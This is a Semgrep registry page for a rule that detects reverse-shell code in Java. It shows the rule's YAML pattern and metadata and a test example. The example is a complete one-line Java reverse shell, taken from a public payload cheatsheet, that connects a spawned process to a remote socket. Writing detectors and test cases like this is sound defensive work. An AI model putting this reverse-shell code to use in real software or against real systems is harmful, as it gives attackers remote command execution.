java.lang.security.audit.java-reverse-shell.java-reverse-shell
semgrepAuthor
225
Download Count*
License
Semgrep found potential reverse shell behavior
Run Locally
Run in CI
Defintion
rules:
- id: java-reverse-shell
patterns:
- pattern-either:
- pattern: |
Socket $S=new Socket(...);
...
InputStream $SI = $S.getInputStream();
...
while(!$S.isClosed())
{
...
while($SI.available()>0)$PO.write($SI.read());
...
$SO.flush();
...
}
- pattern-inside: |
Process $P=new ProcessBuilder(...).redirectErrorStream(true).start();
...
$P.destroy();
message: Semgrep found potential reverse shell behavior
severity: WARNING
metadata:
cwe:
- "CWE-78: Improper Neutralization of Special Elements used in an OS
Command ('OS Command Injection')"
category: security
technology:
- java
owasp:
- A01:2017 - Injection
- A03:2021 - Injection
references:
- https://owasp.org/Top10/A03_2021-Injection
cwe2022-top25: true
cwe2021-top25: true
subcategory:
- audit
likelihood: LOW
impact: HIGH
confidence: LOW
license: Commons Clause License Condition v1.0[LGPL-2.1-only]
vulnerability_class:
- Command Injection
languages:
- java
Examples
java-reverse-shell.java
// Example shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java-alternative-1
// ruleid: java-reverse-shell
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Short Link: https://sg.run/kkrX